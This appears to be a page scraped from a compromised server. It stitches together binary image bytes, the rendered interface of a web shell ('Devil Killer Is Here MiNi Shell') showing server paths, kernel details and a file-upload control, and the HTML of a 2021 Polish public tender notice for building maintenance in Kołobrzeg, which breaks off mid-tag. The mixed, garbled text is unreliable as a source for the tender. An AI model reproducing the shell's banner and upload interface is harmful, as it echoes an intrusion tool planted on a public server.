JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210802/0013345501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00133455 z dnia 2021-08-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Wykonywanie robót konserwacyjnych oraz całodobowa obsługa nieruchomości stanowiących zasób Gminy Miasto Kołobrzeg zarządzanych przez Kołobrzeskie Towarzystwo Budownictwa Społecznego Spółka z o.o.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOŁOBRZESKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920104</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Artyleryjska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kołobrzeg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94 34 474 71</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@ktbs.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ktbs.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonywanie robót konserwacyjnych oraz całodobowa obsługa nieruchomości stanowiących zasób Gminy Miasto Kołobrzeg zarządzanych przez Kołobrzeskie Towarzystwo Budownictwa Społecznego Spółka z o.o.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b36579a7-f133-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00133455</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kolobrzeskietbs.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kolobrzeskietbs.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z treścią rozdziału XI i XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z treścią rozdziału I SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOZ/02/2021/KONSERWACJA BUDYNKI GMK I KTBS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) zakres robót konserwacyjnych w branży ogólnobudowlanej i całodobową obsługę nieruchomości w tym zakresie dotyczących części 1 przedmiotu zamówienia:<br/><br/>A. Prace murarsko –malarskie, w szczególności :<br/>- naprawa uszkodzeń powstałych w wyniku prac konserwacyjnych<br/>- zbicie oraz odtworzenie zbitych i odspojonych tynków na klatkach schodowych na elewacjach<br/>- drobne naprawy schodów, podestów, murków, chodników, terenów utwardzonych, przy danym budynku<br/>B. Drzwi wejściowe do budynków i pomieszczeń wspólnych:<br/>- Smarowanie i reparacja zamków i zawiasów drzwiowych, drzwi wejściowych do budynków , do pomieszczeń wspólnych i altanek śmietnikowych jeśli są zarządzane przez zamawiającego,<br/>- Regulacja i naprawa lub wymiana uszkodzonych zamków i klamek oraz wkładek,<br/>- Dorabianie kluczy,<br/>- Uzupełnianie oleju, regulacja, konserwacja, naprawa i wymiana samozamykaczy,<br/>- Regulacja i dopasowanie drzwi wejściowych do budynku i pomieszczeń wspólnych,<br/>- Wymian pękniętych i uzupełnienie brakujących szyb, w stolarce drzwiowej budynków i pomieszczeń wspólnych<br/>C. Okna w częściach wspólnych:<br/>- Wymiana uszkodzonych zawiasów, zakrętek i śrub w oknach na klatkach schodowych, piwnicach, pomieszczeniach wspólnych w wyjątkowych sytuacjach również w mieszkaniach<br/>- Wymiana pękniętych, uzupełnienie brakujących szyb, uzupełnienie uszczelek w stolarce oraz ślusarce okiennej budynków i pomieszczeń wspólnych<br/>D. Prace dekarsko-blacharskie:<br/>- Przegląd stanu pokryć dachowych- na zlecenie zamawiającego naprawa, wymiana wyłazów dachowych, ław kominowych, rynien, rur spustowych, koryt i koszy ściekowych, uszkodzeń obróbek blacharskich, daszków, gzymsów, pasów pod rynnowych, parapetów zewnętrznych i innych na elewacji i dachu,<br/>- Naprawa i uszczelnienie pokryć dachowych, wymiana, przełożenie lub uzupełnienie pokryć,<br/>- Naprawa i usuwanie przerwanych lub uszkodzonych elementów dachowych: wymiana rynien i uchwytów wraz z lejami sztucerów, kolan, uchwytów i rur spustowych,<br/>- Czyszczenie rur spustowych, koryt i koszy ściekowych z zanieczyszczeń przez osoby posiadające uprawnienia do pracy na wysokości,<br/>- Usuwanie sopli z zachowaniem warunków bezpieczeństwa przez osoby posiadające uprawnienia do pracy na wysokości,<br/>- Naprawa poszycia daszków nad wejściami do budynków,<br/>- Naprawa wyłazów dachowych wraz z wymianą okuć,<br/>- Montaż kratek wentylacyjnych na stropodachach,<br/>- Zakładanie kolcy na ptaki na wniosek zamawiającego<br/>E. Inne<br/>- Montaż wszelkiego rodzaju tablic informacyjnych i ostrzegawczych, zgodnie ze wskazaniami zamawiającego.<br/>- Mocowanie znaków drogowych na wewnętrznych drogach komunikacyjnych,<br/>- Prowadzenie prac naprawczych i modernizacyjnych na placach zabaw,<br/>- Montaż blokad parkingowych<br/>- Prace związane z oznaczeniami poziomymi jezdni, chodników i miejsc parkingowych<br/>Ponadto zakres robót należy wykonać zgodnie ze sztuką budowlaną, zasadami wiedzy technicznej oraz obowiązującymi przepisami prawa. Wykonawca ma obowiązek wykonywania przedmiotu umowy z należytą starannością, zgodnie z umową i ofertą, nienaruszającymi umowy poleceniami Inspektora nadzoru inwestorskiego. Czas reakcji wykonawcy na zgłoszenie zamawiającego nie dłuższy niż 24 godziny z wyłączeniem awarii. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Ponadto Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych robót, zgodnych z przedmiotem zamówienia podstawowego, do 30 % wartości szacunkowej zamówienia podstawowego. Przy wystąpieniu takich robót będą one rozliczane na podstawie podstawie kosztorysu powykonawczego i uwzględnionej w nim podanej w formularzu ofertowym stawki roboczogodziny oraz średnich cen jednostkowych materiałów i sprzętu oraz kosztów zakupu podanych w biuletynie sekocenbud za kwartał poprzedzający okres wykonywanych prac .</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował poniżej podanymi<br/>kryteriami:<br/><br/>1) Cena - stawka roboczostawka roboczogodziny brutto ( SR ) 80%<br/><br/>2) Czas reakcji - (CZR) 20 %<br/><br/>Punktacja :<br/><br/>1) Cena-Stawka roboczogodziny brutto 80 pkt<br/>2) Czas reakcji 20 pkt.<br/><br/><br/>2. Wzory obliczenia punktacji<br/><br/>1) Stawka roboczogodziny brutto SR:<br/>Sposób obliczenia przez Zamawiającego kryterium ceny :<br/> Najniższa SR z ofert<br/>Ilość punktów za stawkę roboczogodziny brutto (SR)= ----------------------------x 80 pkt<br/> SR z oferty badanej <br/><br/>2) Czas reakcji CZR:<br/><br/>Czas reakcji –rozumie się czas w minutach od chwili podjęcia informacji przez wykonawcę o awarii-zdarzeniu nagłym, nieprzewidzianym, losowym, niezależnym od wykonawcy i zamawiającego do chwili bezpośredniego przystąpienia w miejscu zdarzenia przez wykonawcę do likwidacji skutków zdarzenia. Przez zdarzenie nieprzewidziane zamawiający rozumie np. awarię zamka, wybitą szybę, zalanie itp. W związku z tym kryterium wykonawcy mogą zaoferować czas reakcji określony w minutach. Zamawiający ustala maksymalny czas na reakcję 60 minut, w związku z czym zaoferowanie czasu reakcji dłuższego niż 60 minut skutkować będzie odrzuceniem oferty. <br/>Czas reakcji:<br/>do 30 minut - 20 pkt<br/>powyżej 30 minut do 40 minut -10 pkt<br/>powyżej 40 minut - 0 pkt <br/><br/>3) Ocena oferty OF:<br/><br/>OF = SR + CZR <br/><br/>Objaśnienia:<br/>OF -ocena oferty<br/>SR –Stawka roboczogodziny<br/>CZR –Czas reakcji<br/><br/>3. Ilość punktów stanowi podstawę wyboru najkorzystniejszej oferty wygrywa ta, która uzyska największą ilość punktów. Ocenie punktowej zostają poddane tylko oferty tych wykonawców, którzy spełniają warunki udziału w postępowaniu, jak i te oferty, które odpowiadają wszystkim wymaganiom określonym w SWZ i Prawie zamówień publicznych. Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2) zakres robót konserwacyjnych w branży elektrycznej i całodobową obsługę nieruchomości w tym zakresie dotyczących części 2 przedmiotu zamówienia:<br/><br/>- sprawdzenie stanu plomb i zamknięć głównych elementów rozdziału i pomiaru energii elektrycznej jak szafy rozdzielcze, szafy wnęki licznikowe obwodów administracyjnych na okoliczność nielegalnego poboru energii , gdzie umowna odpowiedzialność za właściwy stan instalacji spoczywa na odbiorcy. W przypadku podejrzeń nielegalnego poboru energii natychmiastowe odłączeniu lub ( i) zerwania plomby należy pilnie powiadomić administratora zamawiającego.<br/>- sprawdzanie oraz wymiana uszkodzonych i uzupełnienie brakujących opraw oświetleniowych i osprzętu elektrycznego w pomieszczeniach wspólnych , wejściach do budynków , klatkach schodowych, pomieszczeniach piwnicznych oraz węzłach cieplnych.<br/>- wymiana żarówek, opraw i kloszy oraz jarzeniówek i starterów, dotyczy wejść do budynków, klatek schodowych i pomieszczeń wspólnych , lamp parkowych na bieżąco.<br/>- wymiana zabezpieczeń zwarciowych i termicznych w pomieszczeniach wspólnych.<br/>- wymiana uszkodzonych elementów tablicach rozdzielczych. Malowanie ( oznakowanie) brakujących napisów, oznaczeń , schematów. Dorabianie brakujących osłon, dekli i zamknięć łącznie z kłódkami uniwersalnymi energetycznymi.<br/>- regulacja lub wymiana automatów schodowych na klatkach schodowych.<br/>- regulacja, naprawa, wymiana czujników ruchu.<br/>- regulacja , wymiana , naprawa elektro zaczepów.<br/>- naprawa , wymiana zabezpieczeń, styczników, przycisków, włączników , zegarów itp.<br/>- czyszczenie lamp parkowych.<br/>- inne w miarę wystąpienia i potrzeb dotyczące branży elektrycznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71314100-3 - Usługi elektryczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych robót, zgodnych z przedmiotem zamówienia podstawowego, do 30 % wartości szacunkowej zamówienia podstawowego. Podstawą ustalenia warunków realizacji zamówienia podobnego jest umowa podstawowa oraz przeprowadzone z wykonawcą negocjacje.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował poniżej podanymi<br/>kryteriami:<br/><br/>1) Cena - stawka roboczostawka roboczogodziny brutto ( SR ) 80%<br/><br/>2) Czas reakcji - (CZR) 20 %<br/><br/>Punktacja :<br/><br/>1) Cena-Stawka roboczogodziny brutto 80 pkt<br/>2) Czas reakcji 20 pkt.<br/><br/><br/>2. Wzory obliczenia punktacji<br/><br/>1) Stawka roboczogodziny brutto SR:<br/>Sposób obliczenia przez Zamawiającego kryterium ceny :<br/> Najniższa SR z ofert<br/>Ilość punktów za stawkę roboczogodziny brutto (SR)= ----------------------------x 80 pkt<br/> SR z oferty badanej <br/><br/>2) Czas reakcji CZR:<br/><br/>Czas reakcji –rozumie się czas w minutach od chwili podjęcia informacji przez wykonawcę o awarii-zdarzeniu nagłym, nieprzewidzianym, losowym, niezależnym od wykonawcy i zamawiającego do chwili bezpośredniego przystąpienia w miejscu zdarzenia przez wykonawcę do likwidacji skutków zdarzenia. Przez zdarzenie nieprzewidziane zamawiający rozumie np. awarię zamka, wybitą szybę, zalanie itp. W związku z tym kryterium wykonawcy mogą zaoferować czas reakcji określony w minutach. Zamawiający ustala maksymalny czas na reakcję 60 minut, w związku z czym zaoferowanie czasu reakcji dłuższego niż 60 minut skutkować będzie odrzuceniem oferty. <br/>Czas reakcji:<br/>do 30 minut - 20 pkt<br/>powyżej 30 minut do 40 minut -10 pkt<br/>powyżej 40 minut - 0 pkt <br/><br/>3) Ocena oferty OF:<br/><br/>OF = SR + CZR <br/><br/>Objaśnienia:<br/>OF -ocena oferty<br/>SR –Stawka roboczogodziny<br/>CZR –Czas reakcji<br/><br/>3. Ilość punktów stanowi podstawę wyboru najkorzystniejszej oferty wygrywa ta, która uzyska największą ilość punktów. Ocenie punktowej zostają poddane tylko oferty tych wykonawców, którzy spełniają warunki udziału w postępowaniu, jak i te oferty, które odpowiadają wszystkim wymaganiom określonym w SWZ i Prawie zamówień publicznych. Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3) zakres robót konserwacyjnych w branży sanitarnej i całodobową obsługę nieruchomości w tym zakresie dotyczących części 3 przedmiotu zamówienia:<br/><br/>A. Instalacja wodociągowa CW i ZW , w szczególności:<br/>- usunięcie miejscowych przecieków na instalacji wodociągowej ( dotyczy części wspólnych budynku).<br/>- kontrola prawidłowości działania urządzeń pomiarowych oraz zaworów termoregulacyjnych oraz w razie konieczności ich wymiany.<br/>- wymiana zaworów przelotowych i urządzeń pomiarowych zimnej i cieplej wody na rurociągach z wyłączeniem najemców.<br/>- odłączanie , przywracanie zimnej i ciepłej wody użytkowej do mieszkań .<br/>B. Instalacja kanalizacyjna, w szczególności :<br/>- uszczelnianie rur kanalizacyjnych w częściach nieruchomości wspólnej.<br/>- uszczelnianie i uzupełnianie brakujących pokryw w rewizjach na pionach kanalizacji sanitarnej i deszczowej.<br/>- czyszczenie wpustów ściekowych, studzienek kanalizacyjnych, rur spustowych i osadników deszczowych.<br/>- udrożnienie pionów kanalizacyjnych łącznie z odpowietrzeniem w częściach nieruchomości wspólnej.<br/>- udrożnienie poziomów kanalizacyjnych do pierwszej studzienki rewizyjnej na przykanaliku.<br/>- wymiana rur kanalizacyjnych wraz z podejściami.<br/>C. Instalacja centralnego ogrzewania , w szczególności:<br/>- Sprawdzenie i uzupełnianie poziomu wody w instalacji c.o. , odpowietrzanie instalacji c.o.<br/>- Uruchamianie niesprawnych pojedynczych grzejników, płukanie, regulacja wraz z wymianą elementów niezbędnych do uruchomienia grzejnika np. zaworów grzejnikowych.<br/>- Likwidacja miejscowych przecieków.<br/>- Miejscowe uzupełnianie uszkodzonej izolacji na rurociągach ( c.o., c.w.)<br/>- Odpowietrzenie pionów c.o. w częściach wspólnych.<br/>D. Inne:<br/>- wykonywanie corocznych przeglądów instalacji gazowej w lokalach mieszkalnych oraz w budynkach należących do Gminy Miasto Kołobrzeg. Wykonawca zobowiązany jest do 31 grudnia każdego roku dostarczyć do Zamawiającego protokoły z przeglądu rocznego instalacji gazowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">50720000-8 - Usługi w zakresie napraw i konserwacji centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span 